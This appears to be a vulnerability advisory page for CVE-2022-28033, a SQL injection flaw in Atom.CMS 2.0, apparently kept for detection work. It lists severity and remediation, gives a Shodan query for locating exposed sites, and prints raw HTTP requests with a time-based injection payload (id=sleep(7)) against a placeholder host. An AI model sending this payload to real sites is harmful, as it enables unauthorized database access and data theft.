🔙 목록으로 돌아가기

CVE-2022-28033: Atom.CMS 2.0 - SQL Injection

TitleAtom.CMS 2.0 - SQL Injection
Authorritikchaddha
SeverityCritical
ImpactSuccessful exploitation could lead to unauthorized access, data leakage, and potential data manipulation.
RemediationApply the latest security patches provided by the vendor to mitigate the SQL Injection vulnerability in Atom.CMS 2.0.
CVSS Score9.8
EPSS Score0.58383
CVE IDCVE-2022-28033
CWE IDCWE-89
Shodan Queryhtml:"atomcms"
Tags cve cve2022 atom cms sqli vuln

🔍 Vulnerability Description

Atom.CMS 2.0 is vulnerable to SQL Injection via Atom.CMS_admin_uploads.php which allows an attacker to execute arbitrary SQL commands.

🌐 HTTP Request

GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Connection: close
Accept-Encoding: gzip
GET /admin/uploads.php?id=sleep(7) HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) ConnectPC Safari/537.36
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-28033.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-28033.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A